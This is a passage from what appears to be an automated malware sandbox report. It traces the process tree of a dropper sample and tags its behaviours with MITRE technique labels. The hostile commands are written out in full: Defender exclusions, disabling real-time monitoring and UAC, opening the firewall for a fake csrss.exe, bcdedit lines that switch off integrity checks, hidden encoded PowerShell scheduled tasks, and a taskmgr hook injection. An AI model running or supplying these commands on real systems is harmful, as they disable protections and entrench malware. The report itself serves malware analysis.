PID 2548 wrote to memory of 2380	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	28
PID 2548 wrote to memory of 2380	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	28
PID 2548 wrote to memory of 2380	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	28
PID 2548 wrote to memory of 2792	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2548 wrote to memory of 2792	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2548 wrote to memory of 2792	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2548 wrote to memory of 2792	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2548 wrote to memory of 2792	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2548 wrote to memory of 2792	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2548 wrote to memory of 2792	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2548 wrote to memory of 2792	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2548 wrote to memory of 2792	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2792 wrote to memory of 1892	2792	CasPol.exe	31
PID 2792 wrote to memory of 1892	2792	CasPol.exe	31
PID 2792 wrote to memory of 1892	2792	CasPol.exe	31
PID 2792 wrote to memory of 1892	2792	CasPol.exe	31
PID 2792 wrote to memory of 436	2792	CasPol.exe	32
PID 2792 wrote to memory of 436	2792	CasPol.exe	32
PID 2792 wrote to memory of 436	2792	CasPol.exe	32
PID 2792 wrote to memory of 436	2792	CasPol.exe	32
PID 2792 wrote to memory of 1600	2792	CasPol.exe	33
PID 2792 wrote to memory of 1600	2792	CasPol.exe	33
PID 2792 wrote to memory of 1600	2792	CasPol.exe	33
PID 2792 wrote to memory of 1600	2792	CasPol.exe	33
PID 2792 wrote to memory of 1600	2792	CasPol.exe	33
PID 2792 wrote to memory of 1600	2792	CasPol.exe	33
PID 2792 wrote to memory of 1600	2792	CasPol.exe	33
PID 2792 wrote to memory of 1572	2792	CasPol.exe	36
PID 2792 wrote to memory of 1572	2792	CasPol.exe	36
PID 2792 wrote to memory of 1572	2792	CasPol.exe	36
PID 2792 wrote to memory of 1572	2792	CasPol.exe	36
PID 2792 wrote to memory of 1572	2792	CasPol.exe	36
PID 2792 wrote to memory of 1572	2792	CasPol.exe	36
PID 2792 wrote to memory of 1572	2792	CasPol.exe	36
PID 1600 wrote to memory of 788	1600	Eg3CbaPfPvlHomvqcshBcOpb.exe	34
PID 1600 wrote to memory of 788	1600	Eg3CbaPfPvlHomvqcshBcOpb.exe	34
PID 1600 wrote to memory of 788	1600	Eg3CbaPfPvlHomvqcshBcOpb.exe	34
PID 1600 wrote to memory of 788	1600	Eg3CbaPfPvlHomvqcshBcOpb.exe	34
PID 1600 wrote to memory of 788	1600	Eg3CbaPfPvlHomvqcshBcOpb.exe	34
PID 1600 wrote to memory of 788	1600	Eg3CbaPfPvlHomvqcshBcOpb.exe	34
PID 1600 wrote to memory of 788	1600	Eg3CbaPfPvlHomvqcshBcOpb.exe	34
PID 2792 wrote to memory of 1012	2792	CasPol.exe	35
PID 2792 wrote to memory of 1012	2792	CasPol.exe	35
PID 2792 wrote to memory of 1012	2792	CasPol.exe	35
PID 2792 wrote to memory of 1012	2792	CasPol.exe	35
PID 2792 wrote to memory of 2256	2792	CasPol.exe	38
PID 2792 wrote to memory of 2256	2792	CasPol.exe	38
PID 2792 wrote to memory of 2256	2792	CasPol.exe	38
PID 2792 wrote to memory of 2256	2792	CasPol.exe	38
PID 2792 wrote to memory of 2256	2792	CasPol.exe	38
PID 2792 wrote to memory of 2256	2792	CasPol.exe	38
PID 2792 wrote to memory of 2256	2792	CasPol.exe	38
PID 2256 wrote to memory of 2952	2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe	40
PID 2256 wrote to memory of 2952	2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe	40
PID 2256 wrote to memory of 2952	2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe	40
PID 2256 wrote to memory of 2952	2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe	40
PID 2256 wrote to memory of 2952	2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe	40
PID 2256 wrote to memory of 2952	2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe	40
PID 2256 wrote to memory of 2952	2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe	40
PID 2952 wrote to memory of 1624	2952	Install.exe	45
PID 2952 wrote to memory of 1624	2952	Install.exe	45
PID 2952 wrote to memory of 1624	2952	Install.exe	45
PID 2952 wrote to memory of 1624	2952	Install.exe	45

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
"C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe"
1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2548
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2380
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Users\Admin\Pictures\nWiD3Z1XYXpGAzzD9VqNWAi0.exe
    "C:\Users\Admin\Pictures\nWiD3Z1XYXpGAzzD9VqNWAi0.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1892
  - - C:\Users\Admin\Pictures\nWiD3Z1XYXpGAzzD9VqNWAi0.exe
      "C:\Users\Admin\Pictures\nWiD3Z1XYXpGAzzD9VqNWAi0.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:2844
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2884
- - C:\Users\Admin\Pictures\ufZtkZ7tU2q5FiNysG4oE1Wq.exe
    "C:\Users\Admin\Pictures\ufZtkZ7tU2q5FiNysG4oE1Wq.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:436
  - - C:\Users\Admin\Pictures\ufZtkZ7tU2q5FiNysG4oE1Wq.exe
      "C:\Users\Admin\Pictures\ufZtkZ7tU2q5FiNysG4oE1Wq.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2064
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:1768
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Manipulates WinMon driver.
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1104
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:2592
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2804
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:2672
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2284
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1552
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2628
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2912
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2244
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2220
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:564
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2132
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2816
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2640
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2544
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:1764
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:2892
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1584
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:2568
      - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        6⤵
        Executes dropped EXE
        
        PID:1856
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2288
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:2968
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:1268
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:1216
- - C:\Users\Admin\Pictures\Eg3CbaPfPvlHomvqcshBcOpb.exe
    "C:\Users\Admin\Pictures\Eg3CbaPfPvlHomvqcshBcOpb.exe" /VERYSILENT
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\is-APUP6.tmp\Eg3CbaPfPvlHomvqcshBcOpb.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-APUP6.tmp\Eg3CbaPfPvlHomvqcshBcOpb.tmp" /SL5="$80122,831488,831488,C:\Users\Admin\Pictures\Eg3CbaPfPvlHomvqcshBcOpb.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      Suspicious use of FindShellTrayWindow
      PID:788
- - C:\Users\Admin\Pictures\4o87nTIv9I7pHUjJ8mV2Aynj.exe
    "C:\Users\Admin\Pictures\4o87nTIv9I7pHUjJ8mV2Aynj.exe"
    3⤵
    - Executes dropped EXE
    PID:1012
- - C:\Users\Admin\Pictures\RzhzprthKDuW4ueMbFyqs795.exe
    "C:\Users\Admin\Pictures\RzhzprthKDuW4ueMbFyqs795.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1572
- - C:\Users\Admin\Pictures\7yX7bPXAhwiqyCUH1kmdVYvP.exe
    "C:\Users\Admin\Pictures\7yX7bPXAhwiqyCUH1kmdVYvP.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\7zS6845.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2952
    - - C:\Users\Admin\AppData\Local\Temp\7zS6FA4.tmp\Install.exe
        
        .\Install.exe /tzJfdidzgud "385118" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Checks for any installed AV software in registry
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:1624
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:920
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:1420
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:804
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:1392
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:1784
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:2400
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:1564
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "ghilKvUst" /SC once /ST 00:41:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:1716
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "ghilKvUst"
        6⤵
        
        PID:3064
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "ghilKvUst"
        6⤵
        
        PID:2916
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvpltIhZgYsALGXQsd" /SC once /ST 03:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QsOWyYwTYYzuxBvOU\gGqUKMWHcsuVFmW\HkvKokT.exe\" Wd /AUsite_idPFY 385118 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:2156

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240206025929.log C:\Windows\Logs\CBS\CbsPersist_20240206025929.cab
1⤵
- Drops file in Windows directory
PID:1848

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:2984

C:\Windows\system32\taskeng.exe
taskeng.exe {7FC4866F-9220-4EF7-8430-64ABB77C4334} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]
1⤵
PID:1980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2552
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2140
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2208
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:516

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1120

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2808

C:\Windows\system32\taskeng.exe
taskeng.exe {9775A9AF-E6CF-48AD-AA84-2C7CCA725349} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1900
- C:\Users\Admin\AppData\Local\Temp\QsOWyYwTYYzuxBvOU\gGqUKMWHcsuVFmW\HkvKokT.exe
  C:\Users\Admin\AppData\Local\Temp\QsOWyYwTYYzuxBvOU\gGqUKMWHcsuVFmW\HkvKokT.exe Wd /AUsite_idPFY 385118 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:2772
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gpvgOnMDd" /SC once /ST 00:14:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:908
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gpvgOnMDd"
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gpvgOnMDd"
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:2848
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2076
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:2900
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1988
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gsPayOgNg" /SC once /ST 02:58:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2156
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gsPayOgNg"
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gsPayOgNg"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2948
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2708
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2324
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2164
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2448
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1836
  - - C:\Windows\SysWOW64\reg.exe
